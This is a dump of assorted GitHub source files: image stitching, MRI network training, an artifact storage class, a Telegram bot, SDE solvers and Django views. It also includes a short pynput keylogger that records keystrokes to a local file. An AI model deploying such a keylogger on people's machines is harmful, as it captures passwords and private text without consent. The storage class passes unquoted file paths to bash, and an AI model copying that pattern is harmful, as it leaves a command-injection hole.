cv.imwrite(dir + file_name, imgs[well][position][channel])\n\n\nif __name__ == '__main__':\n # plates_input_dir = ['/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-1__2022-12-23T10_46_22-Measurement-1/export-ij',\n # '/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-2__2022-12-23T09_41_33-Measurement-1/export-ij']\n # plates_export_dir = ['/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-1__2022-12-23T10_46_22-Measurement-1/stitched_enhanced',\n # '/home/franz/Documents/mep/data/organoid-images/221223-Staining-trial-OrganoTrack-BT-FT-MvR/221223-plate-2__2022-12-23T09_41_33-Measurement-1/stitched_enhanced']\n\n fields = 6\n import_dir = ' '\n export_dir = ' '\n wells = [('02', '02')]\n experiment = 'drug_screen_april-05'\n positions = 1\n channels = 1\n time_points = 0\n if experiment == 'drug_screen_april-05':\n fields = 25\n import_dir = '/home/franz/Documents/mep/data/organoid-images/drug-screen-april-05/Images'\n export_dir = '/home/franz/Documents/mep/data/organoid-images/drug-screen-april-05/stitched-Images'\n wells = [('02', '02'), ('02', '03'), ('02', '04'), ('02', '05'), ('02', '06'), ('02', '07'), ('02', '08'),\n ('03', '02'), ('03', '03'), ('03', '04'), ('03', '05'), ('03', '06'), ('03', '07'), ('03', '08'),\n ('04', '02'), ('04', '03'), ('04', '04'), ('04', '05'), ('04', '06'), ('04', '07'), ('04', '08'),\n ('05', '11'), ('06', '11'), ('07', '11')]\n positions = 1\n channels = 1\n elif experiment == 'staining_experiment_2':\n wells = [('02', '02')]\n\n\n all_imgs = read_images(import_dir, wells, positions, channels, fields)\n stiched_imgs = stitch(all_imgs, wells, positions, channels, fields)\n export_imgs(stiched_imgs, export_dir, wells, channels, positions)\n", "repo_name": 
"ErasmusMC-Bioinformatics/OrganoTrack", "sub_path": "Building-OrganoTrack-functionalities/Stitching-field-images/stitch.py", "file_name": "stitch.py", "file_ext": "py", "file_size_in_byte": 14028, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.listdir", "line_number": 118, "usage_type": "call"}, {"api_name": "cv2.imread", "line_number": 124, "usage_type": "call"}, {"api_name": "cv2.IMREAD_GRAYSCALE", "line_number": 124, "usage_type": "attribute"}, {"api_name": "numpy.concatenate", "line_number": 175, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 178, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 183, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 186, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 191, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 196, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 201, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 206, "usage_type": "call"}, {"api_name": "numpy.concatenate", "line_number": 214, "usage_type": "call"}, {"api_name": "cv2.imwrite", "line_number": 237, "usage_type": "call"}]} +{"seq_id": "29597302040", "text": "import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\nimport numpy as np\nfrom Unet_model_fast_mri import Unet\n#import two_channel_dataset_test\nfrom data.base_dataset import BaseDataset, get_transform\nfrom data.image_folder import make_dataset\nfrom PIL import Image\nimport random\nimport scipy.io as sp\nfrom util.util import generate_mask_alpha, generate_mask_beta\nimport scipy.ndimage\nfrom util.util import fft2, ifft2, cplx_to_tensor, complex_conj, complex_matmul, absolute\nfrom util.image_pool import ImagePool\n#from models.base_model import BaseModel\nfrom models import networks\nfrom models.networks import UnetGenerator\nfrom util.metrics import PSNR, roll_2\n#import pytorch_msssim\nfrom util.hfen import hfen\nimport global_network_dataset\nfrom util.util import convert_2chan_into_complex, init_weights\n#from models.didn import DIDN\n \ndevice = torch.device(\"cuda:0\" if torch.cuda.is_available() else \"cpu\")\nnetG = Unet(2,2, num_pool_layers=4,chans=64).to(device)\n\n\n\ninit_weights(netG, init_type='normal',init_gain=0.02)\nnetG = netG.float().to(device)\nnorm = nn.L1Loss().to(device)\n# Loss and optimizer\nlearning_rate = 1e-4\nepoch = 150\ncg_iter =6\nfn = nn.MSELoss().to(device)\noptimG = torch.optim.Adam(netG.parameters(), lr=learning_rate)\ntrain_loss = []\nvali_loss = []\nscheduler = torch.optim.lr_scheduler.MultiStepLR(optimG, milestones=[50,100], gamma=0.6)\n\ndef CG(output, tol ,L, smap, mask, alised_image):\n return networks.CG.apply(output, tol ,L, smap, mask, alised_image)\n\nPSNR_list =[]\ntrain_loss= []\nvali_loss =[]\n\n\n\nfor epoch in range(epoch):\n loss_G_train = 0\n for direct, target,smap,mask in global_network_dataset.train_loader: \n input = direct.to(device).float()\n smap = smap.to(device).float()\n mask = mask.to(device).float()\n label = target.to(device).float()\n temp = input\n for ii in range(cg_iter):\n output = netG(temp)\n output2 = CG(output, tol =0.00001,L= 0.1, smap=smap, mask= mask, alised_image= input)\n temp = output2\n output_final = temp\n optimG.zero_grad()\n loss_G = fn(output_final, label)\n loss_G.backward()\n optimG.step()\n loss_G_train += float(loss_G) \n with torch.no_grad():\n vali_loss_total = 
0\n for vali_direct, vali_target,vali_smap,vali_mask in global_network_dataset.test_loader:\n vali_input = vali_direct.to(device).float()\n vali_smap = vali_smap.to(device).float()\n vali_mask = vali_mask.to(device).float()\n vali_label = vali_target.to(device).float()\n vali_temp = vali_input\n for jj in range(cg_iter):\n vali_output = netG(vali_temp)\n vali_output2 = CG(vali_output, tol =0.00001,L= 0.1, smap=vali_smap, mask= vali_mask, alised_image= vali_input)\n vali_temp = vali_output2\n vali_result = vali_temp\n Loss_vail = fn(vali_result,vali_label)\n vali_loss_total += float(Loss_vail)\n train_loss.append(loss_G_train/2000)\n vali_loss.append(vali_loss_total/5)\n print('V Loss',vali_loss_total/5)\n print(loss_G_train/2800)\n print(epoch)\n\n\n\n\n\n\n\n\n\n\n", "repo_name": "sjames40/Multi_coil_local_model", "sub_path": "multi_coil_global_MODL/train_global_network.py", "file_name": "train_global_network.py", "file_ext": "py", "file_size_in_byte": 3191, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 6, "dataset": "github-code", "pt": "52", "api": [{"api_name": "torch.device", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.cuda.is_available", "line_number": 26, "usage_type": "call"}, {"api_name": "torch.cuda", "line_number": 26, "usage_type": "attribute"}, {"api_name": "Unet_model_fast_mri.Unet", "line_number": 27, "usage_type": "call"}, {"api_name": "util.util.init_weights", "line_number": 31, "usage_type": "call"}, {"api_name": "torch.nn.L1Loss", "line_number": 33, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 33, "usage_type": "name"}, {"api_name": "torch.nn.MSELoss", "line_number": 38, "usage_type": "call"}, {"api_name": "torch.nn", "line_number": 38, "usage_type": "name"}, {"api_name": "torch.optim.Adam", "line_number": 39, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 39, "usage_type": "attribute"}, {"api_name": "torch.optim.lr_scheduler.MultiStepLR", "line_number": 42, "usage_type": "call"}, {"api_name": "torch.optim", "line_number": 42, "usage_type": "attribute"}, {"api_name": "models.networks.CG.apply", "line_number": 45, "usage_type": "call"}, {"api_name": "models.networks.CG", "line_number": 45, "usage_type": "attribute"}, {"api_name": "models.networks", "line_number": 45, "usage_type": "name"}, {"api_name": "global_network_dataset.train_loader", "line_number": 55, "usage_type": "attribute"}, {"api_name": "torch.no_grad", "line_number": 71, "usage_type": "call"}, {"api_name": "global_network_dataset.test_loader", "line_number": 73, "usage_type": "attribute"}]} +{"seq_id": "28488537744", "text": "import os\nimport uuid\n\nimport logging\nimport time\nimport tempfile\nimport re\nfrom threading import Thread\nimport subprocess\nimport shutil\n\n\nimport fs_tracker\nimport util\nimport tarfile\nimport urllib\n\nlogging.basicConfig()\n\n\nclass TartifactStore(object):\n\n def __init__(self, measure_timestamp_diff=True):\n\n if measure_timestamp_diff:\n try:\n self.timestamp_shift = self._measure_timestamp_diff()\n except BaseException:\n self.timestamp_shift = 0\n else:\n self.timestamp_shift = 0\n\n def _measure_timestamp_diff(self):\n\n max_diff = 60\n\n tmpfile = os.path.join(\n tempfile.gettempdir(), str(\n uuid.uuid4()) + '.txt')\n with open(tmpfile, 'w') as f:\n f.write('timestamp_diff_test')\n key = 'tests/' + str(uuid.uuid4())\n self._upload_file(key, tmpfile)\n remote_timestamp = self._get_file_timestamp(key)\n\n if remote_timestamp is not None:\n\n now_remote_diff = time.time() - 
remote_timestamp\n self._delete_file(key)\n os.remove(tmpfile)\n\n assert -max_diff < now_remote_diff and \\\n now_remote_diff < max_diff, \\\n \"Timestamp difference is more than 60 seconds. \" + \\\n \"You'll need to adjust local clock for caching \" + \\\n \"to work correctly\"\n\n return -now_remote_diff if now_remote_diff < 0 else 0\n\n def put_artifact(\n self,\n artifact,\n local_path=None,\n cache=True,\n background=False):\n if local_path is None:\n local_path = artifact['local']\n\n key = artifact.get('key')\n if os.path.exists(local_path):\n tar_filename = os.path.join(tempfile.gettempdir(),\n str(uuid.uuid4()))\n\n if os.path.isdir(local_path):\n local_basepath = local_path\n local_nameonly = '.'\n else:\n local_nameonly = os.path.basename(local_path)\n local_basepath = os.path.dirname(local_path)\n\n if cache and key:\n cache_dir = fs_tracker.get_artifact_cache(key)\n if cache_dir != local_path:\n self.logger.debug(\n \"Copying local path {} to cache {}\"\n .format(local_path, cache_dir))\n\n if os.path.exists(cache_dir) and os.path.isdir(cache_dir):\n shutil.rmtree(cache_dir)\n\n pcp = subprocess.Popen(\n ['cp', '-pR', local_path, cache_dir],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n cpout, _ = pcp.communicate()\n if pcp.returncode != 0:\n self.logger.info(\n 'cp returned non-zero exit code. Output:')\n self.logger.info(cpout)\n\n self.logger.debug(\n (\"Tarring and uploading directory. \" +\n \"tar_filename = {}, \" +\n \"local_path = {}, \" +\n \"key = {}\").format(\n tar_filename,\n local_path,\n key))\n\n tarcmd = 'tar -czf {} -C {} {}'.format(\n tar_filename,\n local_basepath,\n local_nameonly)\n\n self.logger.debug(\"Tar cmd = {}\".format(tarcmd))\n\n tarp = subprocess.Popen(['/bin/bash', '-c', tarcmd],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n tarout, _ = tarp.communicate()\n if tarp.returncode != 0:\n self.logger.info('tar had a non-zero return code!')\n self.logger.info('tar output: \\n ' + tarout)\n\n if key is None:\n key = 'blobstore/' + util.sha256_checksum(tar_filename) \\\n + '.tgz'\n\n def finish_upload():\n self._upload_file(key, tar_filename)\n\n os.remove(tar_filename)\n\n t = Thread(target=finish_upload)\n t.start()\n\n if background:\n return (key, t)\n else:\n t.join()\n return key\n else:\n self.logger.debug((\"Local path {} does not exist. 
\" +\n \"Not uploading anything.\").format(local_path))\n\n def get_artifact(\n self,\n artifact,\n local_path=None,\n only_newer=True,\n background=False):\n\n key = artifact['key']\n\n if local_path is None:\n if 'local' in artifact.keys() and \\\n os.path.exists(artifact['local']):\n local_path = artifact['local']\n else:\n if artifact['mutable']:\n local_path = fs_tracker.get_artifact_cache(key)\n else:\n local_path = fs_tracker.get_blob_cache(key)\n\n local_path = re.sub('\\/\\Z', '', local_path)\n local_basepath = os.path.dirname(local_path)\n\n self.logger.info(\"Downloading dir {} to local path {} from storage...\"\n .format(key, local_path))\n\n if only_newer and os.path.exists(local_path):\n self.logger.debug(\n 'Comparing date of the artifact in storage with local')\n storage_time = self._get_file_timestamp(key)\n local_time = os.path.getmtime(local_path)\n if storage_time is None:\n self.logger.info(\n \"Unable to get storage timestamp, storage is either \" +\n \"corrupted and has not finished uploading\")\n return local_path\n\n if local_time > storage_time - self.timestamp_shift:\n self.logger.info(\n \"Local path is younger than stored, skipping the download\")\n return local_path\n\n tar_filename = os.path.join(tempfile.gettempdir(), str(uuid.uuid4()))\n self.logger.debug(\"tar_filename = {} \".format(tar_filename))\n\n def finish_download():\n self._download_file(key, tar_filename)\n if os.path.exists(tar_filename):\n # first, figure out if the tar file has a base path of .\n # or not\n self.logger.info(\"Untarring {}\".format(tar_filename))\n listtar, _ = subprocess.Popen(['tar', '-tzf', tar_filename],\n stdout=subprocess.PIPE,\n stderr=subprocess.PIPE\n ).communicate()\n listtar = listtar.strip().split('\\n')\n self.logger.info('List of files in the tar: ' + str(listtar))\n if listtar[0].startswith('./'):\n # Files are archived into tar from .; adjust path\n # accordingly\n basepath = local_path\n else:\n basepath = local_basepath\n\n tarcmd = ('mkdir -p {} && ' +\n 'tar -xzf {} -C {} --keep-newer-files') \\\n .format(basepath, tar_filename, basepath)\n tarp = subprocess.Popen(\n ['/bin/bash', '-c', tarcmd],\n stdout=subprocess.PIPE,\n stderr=subprocess.STDOUT)\n\n tarout, tarerr = tarp.communicate()\n if tarp.returncode != 0:\n self.logger.info('tar had a non-zero return code!')\n self.logger.info('tar cmd = ' + tarcmd)\n self.logger.info('tar output: \\n ' + tarout)\n\n if len(listtar) == 1:\n actual_path = os.path.join(basepath, listtar[0])\n self.logger.info(\n 'Renaming {} into {}'.format(\n actual_path, local_path))\n os.rename(actual_path, local_path)\n os.remove(tar_filename)\n else:\n self.logger.warn(\n 'file {} download failed'.format(tar_filename))\n\n t = Thread(target=finish_download)\n t.start()\n if background:\n return (local_path, t)\n else:\n t.join()\n return local_path\n\n def get_artifact_url(self, artifact):\n if 'key' in artifact.keys():\n return self._get_file_url(artifact['key'])\n return None\n\n def delete_artifact(self, artifact):\n if 'key' in artifact.keys():\n self._delete_file(artifact['key'])\n\n def stream_artifact(self, artifact):\n url = self.get_artifact_url(artifact)\n if url is None:\n return None\n\n fileobj = urllib.urlopen(url)\n if fileobj:\n try:\n retval = tarfile.open(fileobj=fileobj, mode='r|gz')\n return retval\n except BaseException as e:\n self.logger.info('Streaming artifact error:\\n' + e.message)\n return None\n", "repo_name": "FrazerBayley/studio", "sub_path": "studio/tartifact_store.py", "file_name": 
"tartifact_store.py", "file_ext": "py", "file_size_in_byte": 9235, "program_lang": "python", "lang": "en", "doc_type": "code", "dataset": "github-code", "pt": "52", "api": [{"api_name": "logging.basicConfig", "line_number": 18, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 38, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 39, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 42, "usage_type": "call"}, {"api_name": "time.time", "line_number": 48, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 50, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 70, "usage_type": "call"}, {"api_name": "os.path", "line_number": 70, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 71, "usage_type": "call"}, {"api_name": "os.path", "line_number": 71, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 71, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 72, "usage_type": "call"}, {"api_name": "os.path.isdir", "line_number": 74, "usage_type": "call"}, {"api_name": "os.path", "line_number": 74, "usage_type": "attribute"}, {"api_name": "os.path.basename", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 79, "usage_type": "call"}, {"api_name": "os.path", "line_number": 79, "usage_type": "attribute"}, {"api_name": "fs_tracker.get_artifact_cache", "line_number": 82, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 88, "usage_type": "call"}, {"api_name": "os.path", "line_number": 88, "usage_type": "attribute"}, {"api_name": "os.path.isdir", "line_number": 88, "usage_type": "call"}, {"api_name": "shutil.rmtree", "line_number": 89, "usage_type": "call"}, {"api_name": "subprocess.Popen", "line_number": 91, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 93, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 94, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 117, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 118, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 119, "usage_type": "attribute"}, {"api_name": "util.sha256_checksum", "line_number": 127, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 133, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 135, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 158, "usage_type": "call"}, {"api_name": "os.path", "line_number": 158, "usage_type": "attribute"}, {"api_name": "fs_tracker.get_artifact_cache", "line_number": 162, "usage_type": "call"}, {"api_name": "fs_tracker.get_blob_cache", "line_number": 164, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 166, "usage_type": "call"}, {"api_name": "os.path.dirname", "line_number": 167, "usage_type": "call"}, {"api_name": "os.path", "line_number": 167, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 172, "usage_type": "call"}, {"api_name": "os.path", "line_number": 172, "usage_type": "attribute"}, {"api_name": "os.path.getmtime", "line_number": 176, "usage_type": "call"}, {"api_name": "os.path", "line_number": 176, "usage_type": "attribute"}, {"api_name": "os.path.join", 
"line_number": 188, "usage_type": "call"}, {"api_name": "os.path", "line_number": 188, "usage_type": "attribute"}, {"api_name": "tempfile.gettempdir", "line_number": 188, "usage_type": "call"}, {"api_name": "uuid.uuid4", "line_number": 188, "usage_type": "call"}, {"api_name": "os.path.exists", "line_number": 193, "usage_type": "call"}, {"api_name": "os.path", "line_number": 193, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 197, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 198, "usage_type": "attribute"}, {"api_name": "subprocess.PIPE", "line_number": 199, "usage_type": "attribute"}, {"api_name": "subprocess.Popen", "line_number": 213, "usage_type": "call"}, {"api_name": "subprocess.PIPE", "line_number": 215, "usage_type": "attribute"}, {"api_name": "subprocess.STDOUT", "line_number": 216, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 225, "usage_type": "call"}, {"api_name": "os.path", "line_number": 225, "usage_type": "attribute"}, {"api_name": "os.rename", "line_number": 229, "usage_type": "call"}, {"api_name": "os.remove", "line_number": 230, "usage_type": "call"}, {"api_name": "threading.Thread", "line_number": 235, "usage_type": "call"}, {"api_name": "urllib.urlopen", "line_number": 257, "usage_type": "call"}, {"api_name": "tarfile.open", "line_number": 260, "usage_type": "call"}]} +{"seq_id": "40508829562", "text": "from platform import python_version\n\nfrom pyrogram.client import Client\nfrom pyrogram.filters import command\nfrom pyrogram.types import Message\n\nfrom .. import strings\n\n\n@Client.on_message(command(\"start\")) # pyright: ignore\nasync def start_cmd(_, message: Message) -> None:\n text = strings.start_message()\n await message.reply(text, quote=False)\n\n@Client.on_message(command(\"help\")) # pyright: ignore\nasync def help_cmd(_, message: Message) -> None:\n text = strings.help_message(python_version())\n await message.reply(text, quote=False)\n\n@Client.on_message(command(\"py\")) # pyright: ignore\nasync def py_cmd_noargs(_, message: Message) -> None:\n if len(message.command) > 1:\n message.continue_propagation()\n text = strings.py_message()\n await message.reply(text, quote=False)\n\n@Client.on_message(command(\"inline\")) # pyright: ignore\nasync def inline_cmd(app: Client, message: Message) -> None:\n me = await app.get_me()\n text = strings.inline_message(me.username)\n await message.reply(text, quote=False)\n", "repo_name": "vabgalimov/py3rbot", "sub_path": "py3rbot/plugins/a_text.py", "file_name": "a_text.py", "file_ext": "py", "file_size_in_byte": 1040, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pyrogram.types.Message", "line_number": 11, "usage_type": "name"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 10, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 10, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 10, "usage_type": "call"}, {"api_name": "pyrogram.types.Message", "line_number": 16, "usage_type": "name"}, {"api_name": "platform.python_version", "line_number": 17, "usage_type": "call"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 15, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 15, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 15, "usage_type": "call"}, {"api_name": "pyrogram.types.Message", "line_number": 21, 
"usage_type": "name"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 20, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 20, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 20, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 28, "usage_type": "name"}, {"api_name": "pyrogram.types.Message", "line_number": 28, "usage_type": "name"}, {"api_name": "pyrogram.client.Client.on_message", "line_number": 27, "usage_type": "call"}, {"api_name": "pyrogram.client.Client", "line_number": 27, "usage_type": "name"}, {"api_name": "pyrogram.filters.command", "line_number": 27, "usage_type": "call"}]} +{"seq_id": "27783359544", "text": "import pynput\r\nfrom pynput.keyboard import Key, Listener\r\n\r\nkeys = []\r\ncount = 0\r\n\r\n\r\ndef on_release(key):\r\n if key == Key.esc:\r\n return False\r\n\r\n\r\ndef on_press(key):\r\n print(\"{} key is pressed\".format(key))\r\n global keys, count\r\n keys.append(key)\r\n count += 1\r\n if count >= 10:\r\n count = 0\r\n writefile(keys)\r\n keys = []\r\n\r\n\r\ndef writefile(keys):\r\n with open(\"log.txt\", \"a\") as f:\r\n for key in keys:\r\n k=str(key).replace(\"'\",\"\")# replacing the single quotes\r\n if(k.find(\"space\")>0):\r\n f.write(\"\\n\") #If number of \"Key.space\" occurences are more than 1 then the following keystrokes will be in a new line\r\n elif(k.find(\"Key\")==-1):\r\n f.write(k) #If any other \"Key.\" is found ohter than the normal numbers and letters then they wont be recorded as keystrokes in \"log.txt\"\r\n \r\nwith Listener(on_press=on_press, on_release=on_release) as listener:\r\n listener.join()\r\n", "repo_name": "ArJuN-1712/Basic-Keylogger", "sub_path": "Basic_Keylogger.py", "file_name": "Basic_Keylogger.py", "file_ext": "py", "file_size_in_byte": 999, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pynput.keyboard.Key.esc", "line_number": 9, "usage_type": "attribute"}, {"api_name": "pynput.keyboard.Key", "line_number": 9, "usage_type": "name"}, {"api_name": "pynput.keyboard.Listener", "line_number": 33, "usage_type": "call"}]} +{"seq_id": "12092864094", "text": "import numpy as np\nfrom Exercise1 import wiener_process\nfrom Exercise3 import riemann_stieltjes\nimport matplotlib.pyplot as plt\n\n\ndef euler_maruyama(x0, T, N):\n [t,W] = wiener_process(T, N)\n h = T/N\n X = [x0]\n for n in range(N):\n f = [i*0.5 for i in X]\n G = X\n new_X = X[n] + h*f[n] + G[n]*(W[n+1]-W[n])\n X += [new_X]\n expl = np.exp(W)\n return [t,X,expl]\n\n\ndef milstein(x0, T, N):\n [t,W] = wiener_process(T, N)\n h = T/N\n X = [x0]\n for n in range(N):\n f = [i*0.5 for i in X]\n G = X\n new_X = X[n] + h*f[n] + G[n]*(W[n+1]-W[n]) + 0.5*G[n]**2*((W[n+1]-W[n])**2 - h)\n X += [new_X]\n expl = np.exp(W)\n return [t, X, expl]\n\n\ndef bdf2_maruyama(x0, T, N):\n [t,W] = wiener_process(T, N)\n h = T/N\n X = [x0, x0 + (h/2)*x0 + x0*(W[1]-W[0])]\n for n in range(2, N):\n f = [i*0.5 for i in X]\n G = X\n X_part = (4/3)*X[n-1] - (1/3)*X[n-2]\n # f_part = (2*h/3)*f[n]\n G_part = G[n-1]*(W[n]-W[n-1]) - (1/3)*G[n-2]*(W[n-1]-W[n-2])\n new_X = (X_part + G_part)/(1-(h/3))\n X += [new_X]\n expl = np.exp(W)\n return [t, X, expl]\n\n\ndef square_diff(X,expl):\n # For mean square difference, it would be good to run this\n # a couple of times for different paths and then take the empirical unbiased mean.\n diff = []\n for i in range(len(X)):\n diff += [(X[i]-expl[i])**2]\n return 
diff\n\n\n[t,Xem,expl] = euler_maruyama(1,1,100)\nplt.plot(t,Xem)\nplt.plot(t,expl)\nplt.show()\n# plt.plot(t,square_diff(Xem,expl))\n# plt.show()\n\n[t,Xm,expl] = milstein(1,1,100)\nplt.plot(t,Xm)\nplt.plot(t,expl)\nplt.show()\n# plt.plot(t,square_diff(Xm,expl))\n# plt.show()\n\n[t,Xb,expl] = bdf2_maruyama(1,1,100)\nplt.plot(t[:-1], Xb)\nplt.plot(t[:-1], expl[:-1])\nplt.show()\n# plt.plot(t[:-1],square_diff(Xb,expl[:-1]))\n# plt.show()", "repo_name": "willet99/stochasticNumerics", "sub_path": "Exercise4.py", "file_name": "Exercise4.py", "file_ext": "py", "file_size_in_byte": 1839, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "Exercise1.wiener_process", "line_number": 8, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 16, "usage_type": "call"}, {"api_name": "Exercise1.wiener_process", "line_number": 21, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 29, "usage_type": "call"}, {"api_name": "Exercise1.wiener_process", "line_number": 34, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 45, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 59, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 59, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 60, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 60, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 61, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 61, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 66, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 66, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 67, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 67, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 68, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 68, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 73, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 73, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 74, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 74, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}]} +{"seq_id": "31228292078", "text": "\nfrom django.shortcuts import render, redirect\nfrom django.contrib import messages\nfrom .forms import UserRegisterForm, UserUpdateForm\nfrom django.contrib.auth.decorators import login_required\nfrom .models import CustomUser\nfrom .forms import FriendForm\n\ndef register(request):\n if request.method == 'POST':\n form = UserRegisterForm(request.POST)\n if form.is_valid():\n form.save()\n username = form.cleaned_data.get('username')\n messages.success(request, f'Your account has been created! 
You can now log in.')\n return redirect('login')\n else:\n form = UserRegisterForm()\n return render(request, 'users/register.html', {'form': form})\n\n@login_required\ndef profile(request, pk=None):\n if pk:\n user = CustomUser.objects.get(pk=pk)\n else:\n user = request.user\n args = {'user': user}\n return render(request, 'users/profile.html', args)\n\n@login_required\ndef update(request):\n if request.method == 'POST':\n form = UserUpdateForm(request.POST, instance=request.user)\n if form.is_valid():\n form.save()\n else:\n form = UserUpdateForm(instance = request.user)\n return render(request, 'users/update.html', {'form': form})\n\n\n\n@login_required\ndef testfindfriends(request):\n qLanguage = request.GET.get(\"language\")\n qAge = request.GET.get(\"age\")\n qUsername = request.GET.get(\"username\")\n users = CustomUser.objects.exclude(id = request.user.id)\n\n\n if (qLanguage == \"on\" or qAge== \"on\" or qUsername):\n if qLanguage == \"on\":\n users = users.filter(language_preference=request.user.language_preference)\n if qAge == \"on\":\n users = users.filter(age_range=request.user.age_range)\n if qUsername:\n users = users.filter(username = qUsername)\n args = {'users':users}\n return render(request, 'users/testfindfriends.html', args)\n else:\n\n args = {'users':users}\n return render(request, 'users/testfindfriends.html', args)", "repo_name": "LanguageExchange/Lex", "sub_path": "users/views.py", "file_name": "views.py", "file_ext": "py", "file_size_in_byte": 2030, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "forms.UserRegisterForm", "line_number": 11, "usage_type": "call"}, {"api_name": "django.contrib.messages.success", "line_number": 15, "usage_type": "call"}, {"api_name": "django.contrib.messages", "line_number": 15, "usage_type": "name"}, {"api_name": "django.shortcuts.redirect", "line_number": 16, "usage_type": "call"}, {"api_name": "forms.UserRegisterForm", "line_number": 18, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 19, "usage_type": "call"}, {"api_name": "models.CustomUser.objects.get", "line_number": 24, "usage_type": "call"}, {"api_name": "models.CustomUser.objects", "line_number": 24, "usage_type": "attribute"}, {"api_name": "models.CustomUser", "line_number": 24, "usage_type": "name"}, {"api_name": "django.shortcuts.render", "line_number": 28, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 21, "usage_type": "name"}, {"api_name": "forms.UserUpdateForm", "line_number": 33, "usage_type": "call"}, {"api_name": "forms.UserUpdateForm", "line_number": 37, "usage_type": "call"}, {"api_name": "django.shortcuts.render", "line_number": 38, "usage_type": "call"}, {"api_name": "django.contrib.auth.decorators.login_required", "line_number": 30, "usage_type": "name"}, {"api_name": "models.CustomUser.objects.exclude", "line_number": 